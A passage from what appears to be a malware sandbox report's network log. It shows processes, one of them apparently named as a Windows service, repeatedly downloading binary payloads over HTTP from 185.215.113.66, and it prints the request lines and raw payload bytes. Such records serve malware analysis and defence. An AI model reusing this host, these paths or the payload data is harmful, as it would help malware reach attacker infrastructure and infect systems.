                                                                              Data Ascii: A8Xx_1%1KEZEM[XX,*dvkn:__p:2@{<@W^Y9UaKJ}_{J5J=N2)kF zXlyd}72iZbEkzf2<Meo9"fbuDgI:65+Zn(ylM
                                                                              May 8, 2024 15:24:19.767258883 CEST1289INData Raw: 04 f1 04 68 70 6d 25 a5 24 64 db 9c 1f 55 9b bb d5 7d 93 b6 b0 59 82 37 48 16 39 7d 95 ba d9 9a 0c e1 8a 9d ec 79 73 e1 b9 9e 01 ac 65 4e 76 07 47 59 6c eb 1a d5 8b f7 6c ba 2b bc 78 f5 54 f8 96 58 43 5d af 42 06 be 91 8b 5c d1 3e 11 89 bf 48 2b
                                                                              Data Ascii: hpm%$dU}Y7H9}yseNvGYll+xTXC]B\>H+8Y?vROQT$O<8c8]>!nxQt1K=Tm`loww?#@!C9/WHO+Rnym:|5`Dd{K/(Y?


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              27192.168.2.849754185.215.113.66802060C:\Users\user\AppData\Local\Temp\1146722911.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              May 8, 2024 15:24:21.341253042 CEST167OUTGET /_2 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
                                                                              Host: 185.215.113.66
                                                                              May 8, 2024 15:24:21.682579041 CEST1289INHTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 08 May 2024 13:24:21 GMT
                                                                              Content-Type: application/octet-stream
                                                                              Content-Length: 9224
                                                                              Last-Modified: Tue, 07 May 2024 18:30:40 GMT
                                                                              Connection: keep-alive
                                                                              ETag: "663a7350-2408"
                                                                              Accept-Ranges: bytes
                                                                              Data Raw: 4e 47 53 21 00 02 00 00 cc da 9c ef c1 96 97 c6 a6 fa 74 6e 9a a2 42 84 a8 83 88 1a b9 20 6d 57 1d 32 de db 10 4c 8c be 23 3a d0 0d 1a 7e 97 fc 31 4d da 46 81 5c 54 e1 4f ef 9c d7 8b 98 6d cf f6 fc 2f dd d0 3c e7 eb c9 01 dd 87 63 83 9d a7 ab c6 43 be 3b 55 fd 37 91 4c 34 55 8e 4d 2c 25 a9 37 be 5a c3 2f 4e eb de d4 96 5b 64 b4 cc 09 be 82 dd 50 f1 6f 53 e9 5c 18 4d ab a1 d8 5c 05 72 55 d1 39 79 8e 8f c0 92 cc a4 84 42 44 84 55 98 8d 35 a7 71 dd f3 7d cc 69 c7 1d ff 18 43 cb a8 42 76 bb da 5a 79 5d 6b c2 c5 f9 3a f6 e3 61 14 36 11 23 7d 5d 3b 29 e1 32 8f c8 5e 22 a3 94 cf 93 1b ce 69 76 8d 1a d6 b4 4e 17 c2 fc 6d 6f 5f 41 00 87 00 c1 5f 00 7a 90 23 9a 51 7e 6e ae bf 1f e4 d0 d3 05 f0 fc 12 6f 78 c3 a9 ca 71 9f 03 b0 4a 07 64 51 21 79 73 30 e4 81 db c9 bd 32 2d 2e 4e bb 64 35 3a 1e 08 41 ed 8e f2 82 df ca 88 fb cf 5a a9 2c 73 62 1a 32 e0 1d 0a 32 b4 69 31 73 bd 7a f9 be 30 a8 54 da ec 30 fb 26 08 4e 51 27 6a 3c b8 81 1a 42 af 5b 2e 70 90 d0 0b 79 f6 84 99 ba 95 ff f0 e9 82 3b 1b ec 96 ae 48 14 95 a7 [TRUNCATED]
                                                                              Data Ascii: NGS!tnB mW2L#:~1MF\TOm/<cC;U7L4UM,%7Z/N[dPoS\M\rU9yBDU5q}iCBvZy]k:a6#}];)2^"ivNmo_A_z#Q~noxqJdQ!ys02-.Nd5:AZ,sb22i1sz0T0&NQ'j<B[.py;H0<yKk6G\lNC=ct{MsThZXlT?S/Q0LfZW,Mif \AMF'bhlJ>xI2Z*XeG)W8'QLTc=>Dw,NM?0N"!2 `_j8*`Fy$D7EjYO&$b.o+zNANMeuumeBV5(%VhRYtNL(2=;DpsubxAl|s,d2-E`pw *vh+GO> IngxCmFh{2Z7|k|`{E#&VV)A>G>#(#,#>KXF=p"iehp7wmt,TNUI~,~iP~V}flj7z_RJLdYKj<yDVTmT@G=GEQlk>nQi^a4|Qp^<r49xLv_ [TRUNCATED]
                                                                              May 8, 2024 15:24:21.682594061 CEST1289INData Raw: c2 0b 7f 53 28 72 18 a7 0b ee 55 6f cb 3d 74 0d 0f 24 2a d4 e2 5e f1 11 0b 67 be e2 a9 95 d4 e3 1a 8a 33 c3 fb 3a 06 e7 5d 63 2c a9 76 a4 40 5b 95 94 55 4e 4f 9d 58 43 89 59 bb 37 cc 7f 1f 27 11 42 25 58 d1 91 c5 11 5e 4d dc 47 c6 41 78 cc c4 9f
                                                                              Data Ascii: S(rUo=t$*^g3:]c,v@[UNOXCY7'B%X^MGAx-,-El4o*c[Tp-%!Ch2)U]Rs;c2E-:-lO~i:2FM3vT&||,A0&(,dT{[{>q87tP_V
                                                                              May 8, 2024 15:24:21.682707071 CEST1289INData Raw: 0a 77 7f 18 36 b7 b6 91 f6 e6 01 f7 fb 10 50 4a 85 63 ef 94 f5 60 b5 c8 06 c8 3d 64 69 da a8 6d 30 32 bf 1e 29 ff 8e c7 b9 25 0e f1 a7 27 9c 08 3d 52 af 70 5d 92 9b c2 a7 1b ca 81 72 a0 4e a1 bd 92 d3 71 a2 66 e1 25 b1 70 36 c3 d0 df c7 b3 11 ca
                                                                              Data Ascii: w6PJc`=dim02)%'=Rp]rNqf%p6/f ^v8M4E@jX5'3A!c@jW]l|7dqsG8v^f']MKhR1HVE&9pX6@n4VX3DNi
                                                                              May 8, 2024 15:24:21.682720900 CEST1289INData Raw: 2a 80 d4 70 56 39 70 59 4d 0f e5 66 e8 46 12 cf 0a fe df f4 7c 25 6d 8f ac d6 8c 63 e2 2c af d7 d4 f1 79 23 96 79 70 f7 15 71 bf 22 00 5f b0 b7 32 f5 4d 1d cc 3f 86 c7 00 fa 71 80 a2 6f 15 92 cb d2 09 07 bf 39 61 4a 6d 1f f0 cf 9a b2 82 28 c8 65
                                                                              Data Ascii: *pV9pYMfF|%mc,y#ypq"_2M?qo9aJm(e*Xpv=,a6o[*C%9=cg7*8xpN&xh[l6R?LdL .[</.`;&1R/Q
                                                                              May 8, 2024 15:24:21.682734013 CEST1289INData Raw: a4 9d aa 76 a5 5b 73 c6 19 e8 80 c3 a4 48 a8 85 ca 88 43 82 67 d3 d6 66 0d 7a 36 34 64 b8 83 cc 98 a4 67 cf 4e 4f 4c 68 80 0c 75 9a 0c 85 a3 9c a5 bd 4a bc ea 47 7f b8 71 b4 9d a0 7b 9b 68 85 84 2c 86 b1 1b 7c 8a 14 67 c6 41 95 51 ff 3e 18 83 6f
                                                                              Data Ascii: v[sHCgfz64dgNOLhuJGq{h,|gAQ>o5{91GaBJRq!_fRy*QCRWLbdTs@/ENA5)d{# o`k_<AiHqN,6eH )LTn^Qnyap)SaM
                                                                              May 8, 2024 15:24:21.682746887 CEST1289INData Raw: 57 ab c1 04 01 4b 78 e6 fc e2 60 39 58 67 cd 41 fc 8a 98 51 b7 4e 6b 4a 3f 87 57 5b 23 21 30 63 d3 6c 63 28 b8 9d ad 2a f5 dc 9b 65 17 ea 19 98 63 fc 8a 0d a7 60 46 fe bc 00 2c d3 b0 d9 d7 df 54 e5 97 00 01 e8 bb 31 c9 86 36 56 69 db 80 e2 55 b0
                                                                              Data Ascii: WKx`9XgAQNkJ?W[#!0clc(*ec`F,T16ViUt[1"Y!?n{T\,|q=q/0T?\QIjcv(JHJdc7-{-sc>d!ql#LqlrvD;`-w/IO:
                                                                              May 8, 2024 15:24:21.682799101 CEST1289INData Raw: 87 d2 44 52 54 d0 7c d3 ef bf 7d 15 8c 05 3e 44 a3 62 eb a9 16 ee 0a e7 ea b7 a4 36 c3 dd c3 ee cf 88 56 4c 2c e5 fd 02 ae 51 65 dc 04 6f dc 97 ca e5 49 9f 6a 7c b1 6c bb b7 39 b1 02 59 2f 47 11 1d c1 f7 34 ba c1 23 0c a5 17 8c cb 01 63 77 22 31
                                                                              Data Ascii: DRT|}>Db6VL,QeoIj|l9Y/G4#cw"1A~.<ZBoD"`(W;`T73-"pI;Igk"DryYwDZMU(RRV)H:Z:{{5\rBn}oIq_7,>h.tV{r
                                                                              May 8, 2024 15:24:21.682806969 CEST465INData Raw: b3 d0 ab 1f 76 29 d1 74 b5 bf 97 38 a1 3e ac 4f 49 3d 20 20 c9 37 69 05 0b 00 02 b6 94 ee e9 61 47 a0 4c 0a 82 8b 91 eb 0c e8 22 83 fc 35 a8 61 47 af 8f 8f f9 0f 41 de 32 73 ff a9 08 b6 33 d9 ff a5 0e cc fc a2 24 bc 6c 9f 31 c5 e1 cc a1 02 e7 fc
                                                                              Data Ascii: v)t8>OI= 7iaGL"5aGA2s3$l1<ce uUK[OZL,NQLm]r.IDaKs%*l!KHtqqbQ=sIIsmVd5ZY*]X7uzEnSVNsp$!wmB


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              28192.168.2.849755185.215.113.66805588C:\Windows\sysbrapsvc.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              May 8, 2024 15:24:21.793037891 CEST166OUTGET /4 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                                                              Host: 185.215.113.66
                                                                              May 8, 2024 15:24:22.131413937 CEST1289INHTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 08 May 2024 13:24:21 GMT
                                                                              Content-Type: application/octet-stream
                                                                              Content-Length: 22272
                                                                              Last-Modified: Wed, 08 May 2024 11:20:38 GMT
                                                                              Connection: keep-alive
                                                                              ETag: "663b6006-5700"
                                                                              Accept-Ranges: bytes
                                                                              Data Raw: 9f 99 07 20 de 8d 44 f2 f6 13 df bc 7b 00 82 92 55 ab c0 21 68 c7 50 d3 19 59 e0 1a 73 e0 76 26 1b b0 8d 43 32 3a 53 97 36 02 bd b0 9d 94 d9 d9 e6 c8 59 cf e0 0e 72 c6 32 5a 9e 9f 97 7c cb 13 c9 e0 19 a5 09 12 87 cb ba 5b 7a e5 af 4d 86 e0 bc 1a 77 78 74 51 85 f5 3f e6 db 6b fc 38 23 e2 47 60 66 86 05 46 d4 d0 61 58 4d 7c 07 df 73 3a ff d9 2e a2 ab f2 89 a6 a5 fe 3f 10 d7 d2 54 e1 66 4c 7f c2 68 a8 2a 13 33 94 81 3c fe a8 55 4d 30 cd 47 a2 f1 35 9b 01 8a 74 b0 79 40 30 5e 56 b0 85 7c ea 4e 29 48 f8 b5 08 05 e7 2b cc 4c d6 f1 a7 9c 9d ed 33 a6 83 5c 4c ce 95 bd fb 74 2d e0 f4 7c fb 1e a8 da 7e b5 55 ad 3b 19 3b a0 c7 ff 22 a0 25 c0 02 20 9c c5 34 2b 3a 79 64 b2 1e 6b 85 de fc 1e 68 5f 98 1a f2 cf 49 c5 25 68 e5 3a 17 ab 13 f7 3b 97 e5 9b 39 16 54 78 41 b6 0c d2 97 ee 7f 2c c9 d6 d3 8c 0d 2e 2e 84 7e 43 b0 7d 2b a8 38 2a 03 a8 92 0a 7a b1 c5 c4 b4 12 c1 9b 29 d1 bd 69 42 b3 09 6c 81 d3 fc 77 f6 47 df 9f 8c 6d 12 1f 88 fb 8c 9f 6b 37 3b ec 4c 7e 36 f7 34 fa 50 ee 6a 0d 7c 09 14 68 b2 73 50 76 bc dc 4e [TRUNCATED]
                                                                              Data Ascii: D{U!hPYsv&C2:S6Yr2Z|[zMwxtQ?k8#G`fFaXM|s:.?TfLh*3<UM0G5ty@0^V|N)H+L3\Lt-|~U;;"% 4+:ydkh_I%h:;9TxA,..~C}+8*z)iBlwGmk7;L~64Pj|hsPvN(~&rf&5a|7{Jt\JW be)k1:Z7Np'P=Q84Dx8As.bi$56R2*)K3WLZpP&&J{=.cCzhZjBB[!N>:.9*v=LFC#GO\ Y6S{gf|=zlA=R0Dqh}RN@yWhQTWTDS{9IYAfE",K*UtKh)3/f4QWi#@NZ~qPp63!cEeV6T8`k?)x\]<SbA2xK? X&|Lxvg(8YD.NL+o=(zuj2@Jj'6=m;A?<JX+K^($1i+:R2|qnCo4jd=Gs%/'A+h"wji*>*b [TRUNCATED]
                                                                              May 8, 2024 15:24:22.131465912 CEST1289INData Raw: 93 5f 6b ef 50 05 9e 69 25 3f 3f 17 47 85 2c 6b 90 92 25 c7 a4 33 c7 b4 ac 01 9f 3c 52 af 59 f7 8f 8c b2 8a 34 83 28 21 34 2c 08 b5 72 a3 55 ed 44 21 fc 8e 2b ad 22 49 d4 df 89 7f 22 e5 ce 47 01 f3 e1 b7 6a 95 90 ad a6 27 76 0c 70 18 34 86 d8 a7
                                                                              Data Ascii: _kPi%??G,k%3<RY4(!4,rUD!+"I"Gj'vp494lqQ " [t%/ ,2wUJSxon2F;DI`yMis)p#{x1mWRHFpwYmv.J]%x;U'i%?^`}ihtPA
                                                                              May 8, 2024 15:24:22.131576061 CEST1289INData Raw: 1c c3 ae 56 be 98 01 6b 9c 1a 7b 08 4e 4a 39 5c 07 87 b3 5b 4f 13 bd 3b 89 f5 de 91 7a 53 87 d5 e3 12 66 87 50 62 62 19 16 47 a1 87 f9 8f 51 ef 1e 4c dd 49 0a 9c c2 51 5f ab bf 5f b4 35 c7 5a 28 84 16 e7 9a 31 36 4e dd 67 f8 5e e6 4a 7b c3 bf 40
                                                                              Data Ascii: Vk{NJ9\[O;zSfPbbGQLIQ__5Z(16Ng^J{@>!HvxGA#J=$SI7l(f^43<P7Xic&mRwaRX_wj15^W:nkv0ExG"F&XI'7K7E"4 gX
                                                                              May 8, 2024 15:24:22.131591082 CEST1289INData Raw: 4f 94 78 c2 97 9b 63 5e be 60 17 93 29 44 bc d5 ec a9 b6 b4 08 90 51 3b 5d 99 88 3b 5e 0f 58 59 77 af 85 ff 08 65 fb e3 41 d7 e2 f9 54 96 02 47 8a ce 86 0b 91 33 f7 77 7b 52 57 56 74 07 cd bb f0 14 bb 02 b2 59 41 06 90 c8 43 63 75 9f 12 f7 70 b7
                                                                              Data Ascii: Oxc^`)DQ;];^XYweATG3w{RWVtYACcup__BTY,q"KGCQ3c0QC/|xB.Lv?X;Wg;cJrm%3Spc[!%dt y>yw{%dg)(Yr]srX!z
                                                                              May 8, 2024 15:24:22.131652117 CEST1289INData Raw: bb fc df 8d e3 0f af 38 97 7e 3c 5b 6a cb 09 b4 59 74 22 8d fb a9 0d f1 60 29 df 4e 90 14 35 9a 75 0a 76 65 4c b0 d5 9a 19 e2 87 dc e0 08 6c 3e d0 b6 f5 62 5c c2 fa 20 19 ef 55 b1 e0 ff 82 1b bf b5 10 12 e3 25 c3 9b 9d 61 84 57 33 23 b2 87 f1 d7
                                                                              Data Ascii: 8~<[jYt"`)N5uveLl>b\ U%aW3#|puO"^?,C5cRaCO($yf"[GH7me0_[1Da$q9&{|oj5o6vT(eWnS-kI<ZV#~sX
                                                                              May 8, 2024 15:24:22.131665945 CEST1289INData Raw: aa 7c 5a 5d 16 d5 71 76 1e 04 c2 b4 d4 90 34 09 eb 56 cd 7d 84 8a 26 c8 b1 15 0d 92 67 ca fe b5 0f b7 5c cc 00 c7 55 08 91 20 53 0e 48 8e e0 75 2e 1a e9 cb 22 b9 eb bc 82 2c 7a 68 56 bd 3a 42 de 02 c6 de 61 ff 10 46 0a 83 2d 97 2a 29 9e 7b 31 05
                                                                              Data Ascii: |Z]qv4V}&g\U SHu.",zhV:BaF-*){1:eU{TjoM{;4gb\rxa"-)*K,K\Id-J\x/AT^)cv_21sc|u7l&{oIt<'2IU;?!E<
                                                                              May 8, 2024 15:24:22.131774902 CEST1289INData Raw: ff 96 34 ff be 9f d7 1d 17 ae 97 a3 e3 1f 25 28 7f a0 76 42 96 9e 6b b3 fb 60 26 c6 18 ac ad fe b7 7a 33 c2 a5 df e6 1a 43 e0 e2 cb e8 3f 38 1c db 04 16 a1 a1 17 a5 e7 10 cb 46 d6 d5 05 02 4d 80 0d ec d3 b7 fc 89 ae ee 3c cb 96 1f cf ef 7f e1 75
                                                                              Data Ascii: 4%(vBk`&z3C?8FM<ue\`O?)m<[nh7RpUT j%#0JjyAsY@Vy8jmtf"|y#3)JG<*0YnhP,I#]a%>+Y
                                                                              May 8, 2024 15:24:22.131795883 CEST1289INData Raw: cc c0 d5 f6 76 58 dc 93 86 0a 7a 73 31 1b 86 f2 99 0b 0a c3 29 1f 18 eb 34 62 30 4f 97 68 7a a7 2b e4 dc 7f 15 02 1c 92 a5 dc 04 bc d8 80 89 c1 7d 31 8d cc 5e 00 3e d9 dd 36 a0 29 2a e4 f0 03 d2 9f fb 5e 89 a7 a8 88 0c db 7f 02 b8 4c 9a 20 b8 99
                                                                              Data Ascii: vXzs1)4b0Ohz+}1^>6)*^L hJL3j104-D.0(C"krOB/Wye(m?hH/"'>X,0Yv*Mhl,]=.R~RO.qS5T{U
                                                                              May 8, 2024 15:24:22.131808996 CEST1289INData Raw: 19 89 96 e9 56 0f 9a 8c 19 b7 05 b4 27 39 21 25 b2 29 35 03 7e f7 f4 ad 75 ff 9f e3 00 20 68 f1 05 5f ae 80 44 41 3a 4f 23 2f d7 4a 79 1a 22 03 77 bd b2 c1 38 a8 21 72 fd 82 f9 23 8d bb de 86 5e 3b f3 ee 08 66 59 00 6d a4 13 79 80 f3 31 29 63 8f
                                                                              Data Ascii: V'9!%)5~u h_DA:O#/Jy"w8!r#^;fYmy1)cWz=9pHjje,]GcDOB)9l)VWdRyl}$C^dC$#nK/tmd}#x,<f7#[e|/")UN+LG.ouX$Js=
                                                                              May 8, 2024 15:24:22.131874084 CEST1289INData Raw: b0 92 f6 3f 1d 3a a3 f2 72 e7 3c ab 2a 56 d3 0e 3d 84 af 84 17 ae fe f6 bf 04 fa eb a8 21 04 10 46 12 99 06 c0 53 db bb dc 0e e4 b2 22 b6 5c 5d 9c 7b 01 fa 03 3e 6e 9b 77 dc 88 bb 7a fb a2 03 db 1e 8b 86 87 65 f2 56 a1 a8 9b f0 68 45 e3 9b 87 f2
                                                                              Data Ascii: ?:r<*V=!FS"\]{>nwzeVhES#n1KBCiD]p(Eqf$c&WhTos_49KJAZqRW'[LZE/+]RsLgQ_<OvqKKmL}:pfj^qh fW]
                                                                              May 8, 2024 15:24:22.471158028 CEST1289INData Raw: ae 13 d9 3c 80 95 1b 13 9e 3f c9 4c 70 f0 19 fc 72 a9 9d 72 9d 76 2d af 9d 78 f3 f8 ea f0 1a 30 30 f2 bc d5 d3 68 75 96 42 e1 16 bf 93 0f ed bd b7 9c 3a 47 ce 12 12 56 20 bf 54 2c 55 54 a9 64 4b e6 87 6a 07 a1 d0 67 f7 7d 50 da fd f5 9c 78 6d fc
                                                                              Data Ascii: <?Lprrv-x00huB:GV T,UTdKjg}PxmZyo!DaH,1$DSP<*J2m-Fhr&:O(d?QhBQ<Mh_)p"b,~b[KWZ5f:Gz}j[6,gXiR6


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              29192.168.2.849756185.215.113.66802060C:\Users\user\AppData\Local\Temp\1146722911.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              May 8, 2024 15:24:24.062493086 CEST167OUTGET /_3 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
                                                                              Host: 185.215.113.66
                                                                              May 8, 2024 15:24:24.408998966 CEST1289INHTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 08 May 2024 13:24:24 GMT
                                                                              Content-Type: application/octet-stream
                                                                              Content-Length: 9224
                                                                              Last-Modified: Tue, 07 May 2024 18:30:44 GMT
                                                                              Connection: keep-alive
                                                                              ETag: "663a7354-2408"
                                                                              Accept-Ranges: bytes
                                                                              Data Raw: 4e 47 53 21 00 02 00 00 cc da 9c ef c1 96 97 c6 a6 fa 74 6e 9a a2 42 84 a8 83 88 1a b9 20 6d 57 1d 32 de db 10 4c 8c be 23 3a d0 0d 1a 7e 97 fc 31 4d da 46 81 5c 54 e1 4f ef 9c d7 8b 98 6d cf f6 fc 2f dd d0 3c e7 eb c9 01 dd 87 63 83 9d a7 ab c6 43 be 3b 55 fd 37 91 4c 34 55 8e 4d 2c 25 a9 37 be 5a c3 2f 4e eb de d4 96 5b 64 b4 cc 09 be 82 dd 50 f1 6f 53 e9 5c 18 4d ab a1 d8 5c 05 72 55 d1 39 79 8e 8f c0 92 cc a4 84 42 44 84 55 98 8d 35 a7 71 dd f3 7d cc 69 c7 1d ff 18 43 cb a8 42 76 bb da 5a 79 5d 6b c2 c5 f9 3a f6 e3 61 14 36 11 23 7d 5d 3b 29 e1 32 8f c8 5e 22 a3 94 cf 93 1b ce 69 76 8d 1a d6 b4 4e 17 c2 fc 6d 6f 5f 41 00 87 00 c1 5f 00 7a 90 23 9a 51 7e 6e ae bf 1f e4 d0 d3 05 f0 fc 12 6f 78 c3 a9 ca 71 9f 03 b0 4a 07 64 51 21 79 73 30 e4 81 db c9 bd 32 2d 2e 4e bb 64 35 3a 1e 08 41 ed 8e f2 82 df ca 88 fb cf 5a a9 2c 73 62 1a 32 e0 1d 0a 32 b4 69 31 73 bd 7a f9 be 30 a8 54 da ec 30 fb 26 08 4e 51 27 6a 3c b8 81 1a 42 af 5b 2e 70 90 d0 0b 79 f6 84 99 ba 95 ff f0 e9 82 3b 1b ec 96 ae 48 14 95 a7 [TRUNCATED]
                                                                              Data Ascii: NGS!tnB mW2L#:~1MF\TOm/<cC;U7L4UM,%7Z/N[dPoS\M\rU9yBDU5q}iCBvZy]k:a6#}];)2^"ivNmo_A_z#Q~noxqJdQ!ys02-.Nd5:AZ,sb22i1sz0T0&NQ'j<B[.py;H0<yKk6G\lNC=ct{MsThZXlT?S/Q0LfZW,Mif \AMF'bhlJ>xI2Z*XeG)W8'QLTc=>Dw,NM?0N"!2 `_j8*`Fy$D7EjYO&$b.o+zNANMeuumeBV5(%VhRYtNL(2=;DpsubxAl|s,d2-E`pw *vh+GO> IngxCmFh{2Z7|k|`{E#&VV)A>G>#(#,#>KXF=p"iehp7wmt,TNUI~,~iP~V}flj7z_RJLdYKj<yDVTmT@G=GEQlk>nQi^a4|Qp^<r49xLv_ [TRUNCATED]
                                                                              May 8, 2024 15:24:24.409182072 CEST1289INData Raw: c2 0b 7f 53 28 72 18 a7 0b ee 55 6f cb 3d 74 0d 0f 24 2a d4 e2 5e f1 11 0b 67 be e2 a9 95 d4 e3 1a 8a 33 c3 fb 3a 06 e7 5d 63 2c a9 76 a4 40 5b 95 94 55 4e 4f 9d 58 43 89 59 bb 37 cc 7f 1f 27 11 42 25 58 d1 91 c5 11 5e 4d dc 47 c6 41 78 cc c4 9f
                                                                              Data Ascii: S(rUo=t$*^g3:]c,v@[UNOXCY7'B%X^MGAx-,-El4o*c[Tp-%!Ch2)U]Rs;c2E-:-lO~i:2FM3vT&||,A0&(,dT{[{>q87tP_V
                                                                              May 8, 2024 15:24:24.409221888 CEST1289INData Raw: 0a 77 7f 18 36 b7 b6 91 f6 e6 01 f7 fb 10 50 4a 85 63 ef 94 f5 60 b5 c8 06 c8 3d 64 69 da a8 6d 30 32 bf 1e 29 ff 8e c7 b9 25 0e f1 a7 27 9c 08 3d 52 af 70 5d 92 9b c2 a7 1b ca 81 72 a0 4e a1 bd 92 d3 71 a2 66 e1 25 b1 70 36 c3 d0 df c7 b3 11 ca
                                                                              Data Ascii: w6PJc`=dim02)%'=Rp]rNqf%p6/f ^v8M4E@jX5'3A!c@jW]l|7dqsG8v^f']MKhR1HVE&9pX6@n4VX3DNi
                                                                              May 8, 2024 15:24:24.409239054 CEST1289INData Raw: 2a 80 d4 70 56 39 70 59 4d 0f e5 66 e8 46 12 cf 0a fe df f4 7c 25 6d 8f ac d6 8c 63 e2 2c af d7 d4 f1 79 23 96 79 70 f7 15 71 bf 22 00 5f b0 b7 32 f5 4d 1d cc 3f 86 c7 00 fa 71 80 a2 6f 15 92 cb d2 09 07 bf 39 61 4a 6d 1f f0 cf 9a b2 82 28 c8 65
                                                                              Data Ascii: *pV9pYMfF|%mc,y#ypq"_2M?qo9aJm(e*Xpv=,a6o[*C%9=cg7*8xpN&xh[l6R?LdL .[</.`;&1R/Q
                                                                              May 8, 2024 15:24:24.409734964 CEST1289INData Raw: a4 9d aa 76 a5 5b 73 c6 19 e8 80 c3 a4 48 a8 85 ca 88 43 82 67 d3 d6 66 0d 7a 36 34 64 b8 83 cc 98 a4 67 cf 4e 4f 4c 68 80 0c 75 9a 0c 85 a3 9c a5 bd 4a bc ea 47 7f b8 71 b4 9d a0 7b 9b 68 85 84 2c 86 b1 1b 7c 8a 14 67 c6 41 95 51 ff 3e 18 83 6f
                                                                              Data Ascii: v[sHCgfz64dgNOLhuJGq{h,|gAQ>o5{91GaBJRq!_fRy*QCRWLbdTs@/ENA5)d{# o`k_<AiHqN,6eH )LTn^Qnyap)SaM
                                                                              May 8, 2024 15:24:24.409749031 CEST1289INData Raw: 57 ab c1 04 01 4b 78 e6 fc e2 60 39 58 67 cd 41 fc 8a 98 51 b7 4e 6b 4a 3f 87 57 5b 23 21 30 63 d3 6c 63 28 b8 9d ad 2a f5 dc 9b 65 17 ea 19 98 63 fc 8a 0d a7 60 46 fe bc 00 2c d3 b0 d9 d7 df 54 e5 97 00 01 e8 bb 31 c9 86 36 56 69 db 80 e2 55 b0
                                                                              Data Ascii: WKx`9XgAQNkJ?W[#!0clc(*ec`F,T16ViUt[1"Y!?n{T\,|q=q/0T?\QIjcv(JHJdc7-{-sc>d!ql#LqlrvD;`-w/IO:
                                                                              May 8, 2024 15:24:24.409843922 CEST1289INData Raw: 87 d2 44 52 54 d0 7c d3 ef bf 7d 15 8c 05 3e 44 a3 62 eb a9 16 ee 0a e7 ea b7 a4 36 c3 dd c3 ee cf 88 56 4c 2c e5 fd 02 ae 51 65 dc 04 6f dc 97 ca e5 49 9f 6a 7c b1 6c bb b7 39 b1 02 59 2f 47 11 1d c1 f7 34 ba c1 23 0c a5 17 8c cb 01 63 77 22 31
                                                                              Data Ascii: DRT|}>Db6VL,QeoIj|l9Y/G4#cw"1A~.<ZBoD"`(W;`T73-"pI;Igk"DryYwDZMU(RRV)H:Z:{{5\rBn}oIq_7,>h.tV{r
                                                                              May 8, 2024 15:24:24.409858942 CEST465INData Raw: b3 d0 ab 1f 76 29 d1 74 b5 bf 97 38 a1 3e ac 4f 49 3d 20 20 c9 37 69 05 0b 00 02 b6 94 ee e9 61 47 a0 4c 0a 82 8b 91 eb 0c e8 22 83 fc 35 a8 61 47 af 8f 8f f9 0f 41 de 32 73 ff a9 08 b6 33 d9 ff a5 0e cc fc a2 24 bc 6c 9f 31 c5 e1 cc a1 02 e7 fc
                                                                              Data Ascii: v)t8>OI= 7iaGL"5aGA2s3$l1<ce uUK[OZL,NQLm]r.IDaKs%*l!KHtqqbQ=sIIsmVd5ZY*]X7uzEnSVNsp$!wmB


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              30192.168.2.849757185.215.113.66805588C:\Windows\sysbrapsvc.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              May 8, 2024 15:24:24.503726959 CEST166OUTGET /5 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                                                              Host: 185.215.113.66
                                                                              May 8, 2024 15:24:24.843621969 CEST1289INHTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 08 May 2024 13:24:24 GMT
                                                                              Content-Type: application/octet-stream
                                                                              Content-Length: 8960
                                                                              Last-Modified: Mon, 06 May 2024 15:56:03 GMT
                                                                              Connection: keep-alive
                                                                              ETag: "6638fd93-2300"
                                                                              Accept-Ranges: bytes
                                                                              Data Raw: 6e 7d d2 5f ce 4a 45 f2 2e c8 0a 06 01 ad 79 a1 63 76 36 9c 33 9d 4c 75 74 4a ce 78 8a 3c ef f0 d5 e4 b0 26 52 79 67 45 ad 70 d3 3a 4b 36 01 0e c6 16 f8 71 c8 1a 6a e2 64 71 7e b1 1a b9 f6 f8 f9 38 23 3c 26 8e 19 a9 67 be 75 d4 b0 b3 ee 7e 56 8d c9 d6 b2 19 08 98 9c 62 5d 08 84 18 e0 a4 81 52 52 f1 22 2d 57 91 35 b1 be bf 00 34 54 15 7a 9f 37 5a 41 a7 67 fd f5 f0 19 bc cb 4d 5d 3b 33 55 47 d7 29 48 84 09 d2 35 61 aa 27 75 84 62 9b 91 c9 fc d8 ab f6 d3 13 57 89 3f 95 ab 64 63 e7 73 c5 5e 05 a5 42 e3 0f 60 42 17 f5 88 3b 8c 25 27 7a 85 fa 04 37 4a f5 68 71 6d 2b 8a 84 61 c2 56 01 36 4f f4 55 cc fc 6b ff 18 a6 02 24 ce 28 d3 a3 ee 8d ef d1 4b 66 64 4b 50 7b ae d7 0c db 98 be e6 d7 4d 22 0d 84 e4 73 47 48 6f f3 f6 ce cb 17 4c 5d f2 e4 99 c3 e4 ef b5 2d 3d 28 e3 2f c2 fc a5 dc 8a c6 15 02 ae 33 6c f0 40 61 05 5b 9c 9f a9 81 6f 78 43 b8 d7 ca 55 ea 3c 2d c6 35 ea e5 78 8b 82 f5 67 d9 dc eb 87 ef 5c 2a 3d 82 67 a4 20 42 ba a1 a9 6e 52 5a b2 74 d1 ff 58 7d 97 69 5f d5 2e dd 2d 9b 94 06 26 